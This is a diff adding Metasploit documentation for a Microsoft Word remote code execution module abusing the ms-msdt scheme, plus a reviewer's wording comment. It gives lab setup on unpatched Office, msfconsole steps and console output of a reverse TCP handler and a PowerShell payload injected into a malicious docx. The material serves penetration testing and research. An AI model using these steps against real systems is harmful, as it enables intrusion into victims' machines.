documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md

```diff
@@ -0,0 +1,87 @@
+This vulnerability exploit a Remote Code Execution in Microsoft Word.
+
+The vulnerability came to light after an independent cybersecurity research team known as nao_sec
+uncovered a Word document (`05-2022-0438.doc`) that was uploaded to VirusTotal from an IP address in Belarus.
+
+The document uses the remote template feature to fetch an `HTML` and then uses the `ms-msdt` scheme to execute `PowerShell` code.
+
+## Vulnerable Application
+
+Waiting more informations when the CVE will be assigned.
+
+### Make your lab
+
+You need official version of Microsoft Office installed. And stay unpatched for this.
+
+Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/word_msdtjs_rce`
+3. `set SRVHOST [IP]`
+4. `set LHOST [IP]`
+5. `run`
+
+## Options
+
+**CUSTOMTEMPLATE**
+
+A DOCX file that will be used as a template to build the exploit.
+
+**OBFUSCATE**
+
+Obfuscate JavaScript content. Default: true
+
+## Scenarios
+
+### Basic use
+
+1. Generate the exploit as following.
+
+```
+[*] Started reverse TCP handler on 172.20.32.36:4444 
+[*] Using URL: http://172.20.32.36:8080/1GWqOqp7e1
+[*] Server started.
+[*] Generate a malicious docx file
+[*] Using template '/tmp/payload.docx'
+[*] Parsing item from template: docProps/
+[*] Parsing item from template: docProps/core.xml
+[*] Parsing item from template: docProps/app.xml
+[*] Parsing item from template: word/
+[*] Parsing item from template: word/theme/
+[*] Parsing item from template: word/theme/theme1.xml
+[*] Parsing item from template: word/styles.xml
+[*] Parsing item from template: word/settings.xml
+[*] Parsing item from template: word/document.xml
+[*] Parsing item from template: word/_rels/
+[*] Parsing item from template: word/_rels/document.xml.rels
+[*] Parsing item from template: word/fontTable.xml
+[*] Parsing item from template: word/webSettings.xml
+[*] Parsing item from template: _rels/
+[*] Parsing item from template: _rels/.rels
+[*] Parsing item from template: [Content_Types].xml
+[*] Injecting payload in docx document
+[*] Finalizing docx 'msf.docx'
+[+] msf.docx stored at /home/[REDACTED]/.msf4/local/msf.docx
+[*] Powershell command length: 3724
+```
+
+2. Execute the DOCX document on a remote vulnerable system.
```

Comment:
Maybe "Open the DOCX documentin MS Office" instead of "Execute the DOCX document"?